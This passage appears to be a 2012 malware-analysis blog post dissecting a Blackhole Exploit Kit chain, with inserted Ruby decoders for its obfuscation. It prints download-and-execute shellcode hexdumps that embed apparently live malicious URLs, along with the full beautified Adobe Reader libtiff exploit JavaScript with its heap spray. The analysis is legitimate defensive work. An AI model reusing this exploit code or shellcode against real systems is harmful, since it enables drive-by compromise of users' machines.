00000220  90 90 74 08 8b ff 55 8b  ec 8d 40 05 ff e0 e8 a6  |..t...U...@.....|
00000230  00 00 00 c3 e8 a0 00 00  00 b8 11 01 04 80 c2 0c  |................|
00000240  00 e8 93 00 00 00 81 ec  00 01 00 00 8b fc 83 c7  |................|
00000250  04 c7 07 32 74 91 0c c7  47 04 63 89 d1 4f c7 47  |...2t...G.c..O.G|
00000260  08 a0 65 97 cb c7 47 0c  51 40 ba 7f c7 47 10 3e  |..e...G.Q@...G.>|
00000270  1d b6 39 c7 47 14 b8 69  d4 1b c7 47 18 be 7f 66  |..9.G..i...G...f|
00000280  a0 c7 47 1c fc a9 37 ad  c7 47 20 98 0a 10 f8 64  |..G...7..G ....d|
00000290  a1 30 00 00 00 8b 40 0c  8b 70 1c ad 8b 68 08 8b  |.0....@..p...h..|
000002a0  f7 6a 04 59 e8 54 00 00  00 90 e2 f8 68 33 32 00  |.j.Y.T......h32.|
000002b0  00 68 55 73 65 72 54 8b  06 e8 55 ff ff ff 8b e8  |.hUserT...U.....|
000002c0  6a 05 59 e8 35 00 00 00  e2 f9 33 ff 57 ff 56 04  |j.Y.5.....3.W.V.|
000002d0  eb 02 58 c3 e8 f9 ff ff  ff 5b c6 07 b8 89 5f 01  |..X......[...._.|
000002e0  66 c7 47 05 ff e0 c3 53  8b dc 53 6a 40 68 00 10  |f.G....S..Sj@h..|
000002f0  00 00 57 8b 46 20 e8 18  ff ff ff 58 c3 51 56 8b  |..W.F .....X.QV.|
00000300  75 3c 8b 74 2e 78 03 f5  56 8b 76 20 03 f5 33 c9  |u<.t.x..V.v ..3.|
00000310  49 41 ad 03 c5 33 db 0f  be 10 3a d6 74 08 c1 cb  |IA...3....:.t...|
00000320  07 03 da 40 eb f1 3b 1f  75 e7 5e 8b 5e 24 03 dd  |...@..;.u.^.^$..|
00000330  66 8b 0c 4b 8b 5e 1c 03  dd 8b 04 8b 03 c5 ab 5e  |f..K.^.........^|
00000340  59 c3 e8 dd fc ff ff b2  f2 e2 f4 39 e2 7d 83 da  |Y..........9.}..|
00000350  48 7b 3d 32 74 91 0c 85  df af bb 63 89 d1 4f 51  |H{=2t......c..OQ|
00000360  40 ba 7f a0 65 97 cb 1e  a4 64 ef 93 32 e4 94 8e  |@...e....d..2...|
00000370  13 0a ac c2 19 4b 01 c4  8d 1f 74 57 66 0d ff 43  |.....K....tWf..C|
00000380  be ac db 7d f0 a5 9a 52  fe a7 da 3e 1d b6 39 b8  |...}...R...>..9.|
00000390  69 d4 1b be 7f 66 a0 fc  a9 37 ad 98 0a 10 f8 80  |i....f...7......|
000003a0  d6 af 9a fb 53 15 66 68  74 74 70 3a 2f 2f 77 6d  |....S.fhttp://wm|
000003b0  62 2e 35 31 35 31 6c 70  2e 63 6f 6d 2f 74 74 78  |b.5151lp.com/ttx|
000003c0  7a 2e 74 78 74 00 7e 7e                           |z.txt.~~|
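As an added example (not part of the original post), here is how the %u-escaped blob above can be turned into bytes in Ruby and the XOR key recovered without Malzilla: undo the cgTw6 marker, unescape each %uXXXX as a little-endian 16-bit unit, then try all 256 single-byte keys and keep the one under which the output contains a string the payload has to carry, such as "http://". The blob inside the script is a constructed sample encoded the same way with key 0xBD; the page's full string is not reproduced here.

```ruby
#!/usr/bin/ruby
# Added example, not code from the original post: decode the %uXXXX-escaped
# shellcode string from ppp.html into bytes and recover the single-byte XOR
# key by brute force, looking for a plaintext marker the payload must
# contain ("http://", since it is a download-and-execute stub).

# JavaScript unescape("%uABCD") yields one UTF-16 code unit 0xABCD, which
# sits in memory little-endian, i.e. bytes CD AB. A plain %XX escape is one
# byte. Anything else is copied through as-is.
def unescape_to_bytes(str)
  bytes = []
  i = 0
  while i < str.length
    if str[i, 2] == '%u' && str[i + 2, 4].to_s =~ /\A\h{4}\z/
      unit = str[i + 2, 4].to_i(16)
      bytes << (unit & 0xff) << (unit >> 8)   # low byte first
      i += 6
    elsif str[i] == '%' && str[i + 1, 2].to_s =~ /\A\h{2}\z/
      bytes << str[i + 1, 2].to_i(16)
      i += 3
    else
      bytes << str[i].ord
      i += 1
    end
  end
  bytes.pack('C*')
end

# The sample hides the %u prefix behind the marker cgTw6; undo that first,
# exactly as ckwmckwm.replace(/cgTw6/g, '%u') does in the page.
def blob_to_bytes(blob, marker = 'cgTw6')
  unescape_to_bytes(blob.gsub(marker, '%u'))
end

def xor_bytes(data, key)
  data.bytes.map { |b| b ^ key }.pack('C*')
end

# Try all 256 single-byte keys; return [key, decoded] for the first key whose
# output contains the marker, or nil if none does. The decoder stub at the
# front of the real blob is not XOR-encoded, but that does not matter here:
# we only need the key under which the marker appears somewhere.
def recover_xor_key(data, marker = 'http://')
  (0..255).each do |key|
    out = xor_bytes(data, key)
    return [key, out] if out.include?(marker)
  end
  nil
end

# Constructed sample (not the page's blob): two NOPs, a made-up URL and two
# NUL bytes, XORed with 0xBD and escaped the way ppp.html does. Note that
# "cgTw6BDBD" (two NULs under key 0xBD) and "cgTw62D2D" (the 90 90 NOPs)
# also show up in the real blob above.
SAMPLE_BLOB = 'cgTw62D2DcgTw6C9D5cgTw6CDC9cgTw69287cgTw6DC92cgTw6D493' \
              'cgTw6CBD3cgTw6D1DCcgTw6D9D4cgTw6C592cgTw6BDBD'

if __FILE__ == $0
  key, plain = recover_xor_key(blob_to_bytes(SAMPLE_BLOB))
  printf("key 0x%02X -> %s\n", key, plain.inspect)
end
```

Brute-forcing all keys and filtering on a known marker is the generic move whenever a single-byte XOR is suspected; if no marker is known, ranking the 256 candidates by how many printable bytes they produce is a workable fallback.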

The Binary

I managed to get the binary. However, I'm a bit confused, as the binary does not seem to be a valid Windows executable, and it won't execute in a sandbox. I sent the sample to VT, which resulted in 0/0 (https://www.virustotal.com/file/7b46896e5d6113b472fbf3ca95bcd2139671de480e2c4dbf165b21ef0dde055a/analysis/).

If any readers would like the sample for further analysis, just ping me; I'd love to share it, and feel free to share any findings you get from it.

Conclusion

From the analysis and some other research, my verdict is that this exploitation has to do with the CVE-2012-4969 vulnerability. The <img> whose src is the 51.la URL might return the value "YMjf\u0c08\u0c0cKDogjsiIejengNEkoPDjfiJDIWUAzdfghjAAuUFGGBSIPPPUDFJKSOQJGH" to exploit the CMshtmlEd::Exec function in mshtml.dll, which in Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code. The spray in ppp.html above, built from %u0c0c, is consistent with the \u0c0c characters in that trigger string.

As for the binary itself, it is not the final payload delivered to the user. With its file size of 8.0 KB, it might be an intermediary that downloads another binary to install on the user's computer.

That's it for now, bye bye.

Tuesday, October 2, 2012

An Evening with Blackhole Exploit Kit v2.0 III

In my previous post, I managed to get the PDF sample from the exploit page and consequently the payload within the PDF exploit itself.

As discussed in the previous post about the function x(), which is used to encode the URL parameters in show_pdf2(), I get the same PDF sample regardless of the values inside cpdgszkh, uln and wjlajcro. So for now I assume those URL parameter values are not cross-checked on the Blackhole backend.

With the PDF sample, I started the analysis. The sample was crafted to exploit the libtiff vulnerability in Adobe Reader (CVE-2010-0188). The common libtiff exploit uses contentType="image/tiff" to embed the exploit plus payload encoded in base64. That can be analyzed easily by decoding the base64 and reading the payload straight away.

The Blackhole exploit kit version of the libtiff exploit (like many other in-the-wild samples) adds another layer of obfuscation: a JavaScript stage that runs before the TIFF exploit and payload are produced. We can spot it through contentType="application/x-javascript":

<xfa:script contentType='application/x-javascript'>
/*sagasgasgasg
with(event){
k=target.eval;
if((app.addMenuItem+"")!=-1){a=target.keywords;}
}*/
with(event){
k=target.eval;
if((app.addMenuItem+"").indexOf('native')!=-1){a=target.keywords;}
}
s="";
z=a;
for(i=0;i<a.length;i+=2){
 s+=String.fromCharCode(parseInt(z[i]+z[i+1],28));
}
k(s);
</xfa:script>

In the JS snippet above, with the help of parseInt and fromCharCode, the script evals the decoded value of target.keywords. The pairs are base 28 here rather than the base 31 used on the HTML landing page. The (app.addMenuItem+"").indexOf('native') test is a simple anti-emulation check: in Reader the stringified native API function contains "[native code]", which a JavaScript stub in an analysis tool usually does not, so the keywords are only read (and the eval only fed) inside a real Reader. As usual, target.keywords (or, in earlier samples, this.keywords) takes its value from the PDF /Keywords key:

3 0 obj<</Keywords(3d40401i3d3o3h4244253h463h3q441i443d423j3h441i3f423h3d443l3r3q2c3d443h1i423h403o3d3f3h1c1j1g1j3j1g1b1b1d23463d4214403d3g3g3l3q3j23463d42143e3e3e1g143f3f3f1g143g3g3g1g143h3h3h1g143i3i3i1g143j3j3j1g143k3k3k23463d4214403r3l3q443h42433b3d1g143l23463d4214481425143q3h47142942423d491c1d23463d4214491425143q3h471
...
snip
...
3b3o3o1m253b3m3l1l1c3b3m1r1g1b1b1d233l3i1c3b3o3o1m1i3o3h3q3j443k191m1d3b3o3o1m1f25453q3h433f3d403h1c1b191k1k1b1d233b3o3o1n253b3m1m1c3b3o3o1m1d23473l443k1c4b3n223b3o3o1n4d1d3b2h1k1c3n1d232h3p3d3j3h2e3l3h3o3g1l1i423d47323d3o453h253b3o3o1l4d3b3m1n1c1d23)
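The same pair decoding appears twice on this page: base 31 for the <div> attribute blob of the Blackhole landing page (step 4 in the first post) and base 28 for the /Keywords string here. The following is an added example, not code from the original posts: a single Ruby decoder with the base as a parameter, a helper that gathers the <div> attributes the way the landing page's getAttribute(0), getAttribute(1), ... loop does (stopping at the first missing index rather than sorting every numeric attribute), and a helper that pulls /Keywords out of PDF object text. The /Keywords regex assumes the simple unescaped form seen in this sample. The fragments fed to it at the bottom are taken from the samples on this page.

```ruby
#!/usr/bin/ruby
# Added example, not code from the original posts: one decoder for the two
# "pairs of base-N digits" schemes on this page. The Blackhole v2 landing
# page strips everything outside [0-9a-z] from the <div> attribute values
# and decodes 2-character pairs in base 31; the PDF stage decodes the
# /Keywords string the same way in base 28. Only the base differs.

# Digit alphabet used by JavaScript parseInt(): 0-9 then a-z.
DIGITS = ('0'..'9').to_a + ('a'..'z').to_a

# Decode a string of 2-character base-`base` digits into text, dropping
# noise characters first (the page's asd() does the same with
# /[^012a-z3-9]/). Raises on a digit that is out of range for the base,
# where parseInt() would silently produce NaN and fromCharCode a "\0".
def decode_pairs(blob, base)
  raise ArgumentError, "base must be 2..36" unless (2..36).cover?(base)
  digits = blob.downcase.gsub(/[^0-9a-z]/, '')
  digits.scan(/../).map do |pair|
    value = pair.each_char.reduce(0) do |acc, ch|
      d = DIGITS.index(ch)
      raise ArgumentError, "digit #{ch.inspect} is not valid in base #{base}" if d >= base
      acc * base + d
    end
    value.chr(Encoding::UTF_8)   # String.fromCharCode equivalent
  end.join
end

# Collect the numeric attributes of a <div> the way the landing page's loop
# does: getAttribute(0), getAttribute(1), ... joined in numeric order and
# stopping at the first index that is missing, not at the last one present.
# Sorting every numeric attribute, as the Ruby script in the first post
# does, would also swallow decoy attributes placed after a gap.
def div_blob(div_tag)
  attrs = div_tag.scan(/\s(\d{1,3})="([^"]*)"/).map { |name, value| [name.to_i, value] }.to_h
  out = String.new
  i = 0
  while attrs.key?(i)
    out << attrs[i]
    i += 1
  end
  out
end

# Pull the /Keywords string out of PDF object text. This assumes the simple
# /Keywords(...) form used by the sample, without escaped parentheses inside;
# full PDF string syntax (\( \) and octal escapes) is not handled.
def keywords_from_pdf(pdf_text)
  m = pdf_text.match(%r{/Keywords\s*\(([^)]*)\)})
  m && m[1]
end

if __FILE__ == $0
  # Fragments taken from the samples on this page.
  puts decode_pairs('3d40401i3d3o3h4244', 28)   # start of the /Keywords stage: app.alert
  puts decode_pairs('3j3f+3o3a3c3h3m', 31)      # from the <div> attribute blob: plugins
end
```

Running it on the full /Keywords value of the object above reproduces the app.alert = event.target.creationDate... stage that is beautified further down.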

By replacing target.keywords with the value of /Keywords and running the eval, another JS stage is produced whose purpose is obviously to build the payload together with the exploit. The payload is obfuscated as well; this time it comes from target.creationDate, which, like target.keywords, takes its value from the PDF /CreationDate key. Below is the beautified version:

app.alert = event.target.creationDate.replace(/,/g, '');
var padding;
var bbb, ccc, ddd, eee, fff, ggg, hhh;
var pointers_a, i;
var x = new Array();
var y = new Array();
var _l1 = "4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141414141414141" + event.target.creationDate.replace(/,/g, '');
var _l2 = "4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a41414141260000000000000000000000000000007188804a6420600f000400004141414141414141" + event.target.creationDate.replace(/,/g, '');
_l3 = app;
_l4 = new Array();

function _l5() {
    var _l6 = _l3.viewerVersion.toString();
    _l6 = _l6.replace('.', '');
    while (_l6.length < 4) _l6 += '0';
    return parseInt(_l6, 10)
}
function _l7(_l8, _l9) {
    while (_l8.length * 2 < _l9) _l8 += _l8;
    return _l8.substring(0, _l9 / 2)
}
function _I0(_I1) {
    _I1 = unescape(_I1);
    roteDak = _I1.length * 2;
    dakRote = unescape('%u9090');
    spray = _l7(dakRote, 0x2000 - roteDak);
    loxWhee = _I1 + spray;
    loxWhee = _l7(loxWhee, 524098);
    for (i = 0; i < 400; i++) _l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
}
function _I2(_I1, len) {
    while (_I1.length < len) _I1 += _I1;
    return _I1.substring(0, len)
}
function _I3(_I1) {
    ret = '';
    for (i = 0; i < _I1.length; i += 2) {
        b = _I1.substr(i, 2);
        c = parseInt(b, 16);
        ret += String.fromCharCode(c);
    }
    return ret
}
function _ji1(_I1, _I4) {
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6++) {
        _l9 = _I4.length;
        _I7 = _I1.charCodeAt(_I6);
        _I8 = _I4.charCodeAt(_I6 % _l9);
        _I5 += String.fromCharCode(_I7 ^ _I8);
    }
    return _I5
}
function _I9(_I6) {
    _j0 = _I6.toString(16);
    _j1 = _j0.length;
    _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
    return _I5
}
function _j2(_I1) {
    _I5 = '';
    for (_I6 = 0; _I6 < _I1.length; _I6 += 2) {
        _I5 += '%u';
        _I5 += _I9(_I1.charCodeAt(_I6 + 1));
        _I5 += _I9(_I1.charCodeAt(_I6))
    }
    return _I5
}
function _j3() {
    _j4 = _l5();
    if (_j4 < 9000) {
        _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
        _j6 = _l1;
        _j7 = _I3(_j6)
    } else {
        _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
        _j6 = _l2;
        _j7 = _I3(_j6)
    }
    _j8 = 'SUkqADggAABB';
    _j9 = _I2('QUFB', 10984);
    _ll0 = 'QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
    _ll1 = _j8 + _j9 + _ll0 + _j5;
    _ll2 = _ji1(_j7, '');
    if (_ll2.length % 2) _ll2 += unescape('');
    _ll3 = _j2(_ll2);
    with({
        k: _ll3
    }) _I0(k);
    ImageField1.rawValue = _ll1
}
_j3();

Looking at the variables _l1 and _l2, they are obviously shellcode stubs that get the URL for download-and-execute appended from /CreationDate; _l1 is used when _l5() reports a viewer version below 9 (the padded number is under 9000) and _l2 otherwise, the two differing only in the embedded addresses. Note that _ji1 is called with an empty key, so its XOR loop is a no-op (charCodeAt on an empty string gives NaN, which XORs as 0) and the hex bytes pass through unchanged into the %u spray. Combining _l1 with the value of /CreationDate gives the full shellcode:

00000000  4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  |L `....J< `..c.J|
00000010  a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  |...J0 .Jn/.JAAAA|
00000020  26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |&...............|
00000030  12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  |.9.Jd `.....AAAA|
00000040  41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  |AAAAf......u4._3|
00000050  c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  |.d.@0.@..p.V.v.3|
00000060  db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  |.f.^<.t3,.......|
00000070  8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  |.@0.F9.u..4$..uQ|
00000080  e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  |..LQV.u<.t5x..V.|
00000090  76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  |v ..3.IA....3...|
000000a0  10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  |[email protected];.u|
000000b0  e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  |.^.^$..f..K.F..T|
000000c0  24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  |$...........^Y..|
000000d0  53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  |S..h .}.3t.....h|
000000e0  08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  |...j.Y..........|
000000f0  00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  |[email protected]|
00000100  55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  |U...^......hon..|
00000110  68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  |hurlmT........a.|
00000120  ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  |.....r.......\$.|
00000130  c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  |..$regs.D$.vr32.|
00000140  44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  |D$. -s Sh.....V.|
00000150  8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  |..3.Q.D..wpbt.D.|
00000160  05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  |..dll.D...Y...0.|
00000170  44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  |D..AQj.j.SWj..V.|
00000180  85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  |..u.j.S.V.j....S|
00000190  ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  |.V........G.?.u.|
000001a0  47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  |G.?.u.j.j..V....|
000001b0  ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  |...N.......o..3.|
000001c0  8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  |.[..Fy6./phttp:/|
000001d0  2f 73 65 63 74 61 6e 74  65 73 2d 78 2e 72 75 3a  |/sectantes-x.ru:|
000001e0  38 30 38 30 2f 66 6f 72  75 6d 2f 6c 69 6e 6b 73  |8080/forum/links|
000001f0  2f 63 6f 6c 75 6d 6e 2e  70 68 70 3f 61 77 67 6e  |/column.php?awgn|
00000200  73 67 6a 3d 30 61 30 62  30 39 30 33 30 62 26 67  |sgj=0a0b09030b&g|
00000210  62 6f 76 69 3d 33 33 30  37 30 39 33 37 33 38 30  |bovi=33070937380|
00000220  37 30 37 33 36 30 36 30  62 26 74 6f 77 68 67 66  |70736060b&towhgf|
00000230  3d 30 33 26 61 6d 79 77  79 65 72 6d 3d 6a 71 69  |=03&amywyerm=jqi|
00000240  73 79 7a 74 26 73 71 65  6d 68 3d 68 79 69 6d 6a  |syzt&sqemh=hyimj|
00000250  00 00                                             |..|
00000252
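The Ruby side of this, as an added example that is not the author's own script: undoing the `%u` encoding that `_j2()` in the JavaScript above applies to the shellcode, dumping the recovered bytes in the same xxd layout, and pulling the embedded URL out of them. The sample bytes and the `example.invalid` host are constructed stand-ins, not data from the analyzed PDF.

```ruby
# Reverse of _j2: it emits "%u" + hex(b1) + hex(b0) per byte pair, i.e.
# little-endian 16-bit words, so each %uXXXX yields bytes [low, high].
# Assumption: every charCode _j2 sees is a byte value (0..255), as here.
def unescape_u(str)
  bytes = []
  str.scan(/%u(\h{4})/).flatten.each do |hex|
    word = hex.to_i(16)
    bytes << (word & 0xff) << (word >> 8)
  end
  bytes.pack('C*')
end

# Forward direction (a Ruby port of _j2/_I9), used here to build test input.
def escape_u(bin)
  bin = bin.b + "\x00".b if bin.bytesize.odd?  # pad so every byte sits in a word
  bin.bytes.each_slice(2).map { |b0, b1| format('%%u%02x%02x', b1, b0) }.join
end

# Printable runs of at least `min` characters, the way strings(1) reports them.
def printable_strings(bin, min = 4)
  bin.scan(/[\x20-\x7e]{#{min},}/n)
end

# URLs inside those runs: this is where the DownloadExec target sits.
def extract_urls(bin)
  printable_strings(bin).flat_map { |s| s.scan(%r{https?://[^\s\x00"']+}) }
end

# xxd-style dump in the layout shown in the post.
def hexdump(bin)
  bin.bytes.each_slice(16).each_with_index.map do |row, i|
    hex = row.map { |b| format('%02x', b) }.join(' ')
    asc = row.map { |b| b.between?(0x20, 0x7e) ? b.chr : '.' }.join
    format('%08x  %-47s  |%s|', i * 16, hex, asc)
  end.join("\n")
end

# Constructed stand-in for a shellcode tail: a few opcode bytes, then a URL.
SAMPLE = ("\x33\xc0\x64\x8b\x40\x30\x68\x6f\x6e\x00\x00" \
          "http://example.invalid:8080/forum/links/column.php?a=1\x00").b

if __FILE__ == $0
  escaped = escape_u(SAMPLE)          # what the PDF's JavaScript would hand to _I0()
  puts escaped
  puts hexdump(unescape_u(escaped))   # recover the bytes and dump them
  p extract_urls(unescape_u(escaped)) # => the URL to submit to VirusTotal
end
```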

[[email protected] analysis]$ ruby virustotal.rb column.php\?awgnsgj\=0a0b09030b\&gbovi\=3307093738070736060b\&towhgf\=03\&amywyerm\=jqisyzt\&sqemh\=hyimj
warning: peer certificate won't be verified in this SSL session
Date submitted:  2012-09-30 18:54:40
      Fortinet:  W32/Kryptik.AB!tr
    TrendMicro:  WORM_CRIDEX.DI
      Symantec:  Trojan.Gen
           AVG:  Agent_r.BNO
   BitDefender:  Trojan.Generic.KDV.742222
         GData:  Trojan.Generic.KDV.742222
       ViRobot:  Trojan.Win32.A.PornoAsset.137216.C
        F-Prot:  W32/Falab.F16.gen!Eldorado
     AhnLab-V3:  Trojan/Win32.PornoAsset
      F-Secure:  Trojan.Generic.KDV.742222
      nProtect:  Trojan.Generic.KDV.742222
        Ikarus:  Trojan-Ransom.Win32.PornoAsset
         VIPRE:  Trojan.Win32.Generic!BT
         Panda:  Suspicious file
         Avast:  Win32:Carberp-AJF [Trj]
 CAT-QuickHeal:  (Suspicious) - DNAScan
    ESET-NOD32:  a variant of Win32/Kryptik.AMHF
       PCTools:  Trojan.Gen
     Commtouch:  W32/Falab.F16.gen!Eldorado
McAfee-GW-Edition:  Ransom!gu
     Kaspersky:  Trojan-Ransom.Win32.PornoAsset.abup
        Sophos:  Mal/Ransom-Z
         DrWeb:  Trojan.DownLoad2.39083
        Norman:  W32/Kryptik.BUS
       AntiVir:  TR/Rogue.kdv.742222
        Comodo:  UnclassifiedMalware
        McAfee:  Artemis!9F86A132C0A5

With the sample analyzed, I take the opportunity to write a YARA rule from that PDF sample, again just to exercise pattern matching and generalization across different samples.

[[email protected] analysis]$ python pdf-parser.py -f -w column.php\?cpdgszkh\=0a0b09030b\&uln\=44\&rfor\=3307093738070736060b\&wjlajcro\=0b00040003 > inflated_pdf.pdf 
[[email protected] analysis]$ yara -r PDF.yar inflated_pdf.pdf
CVE_2011_2462_libTIFF_Blackhole inflated_pdf.pdf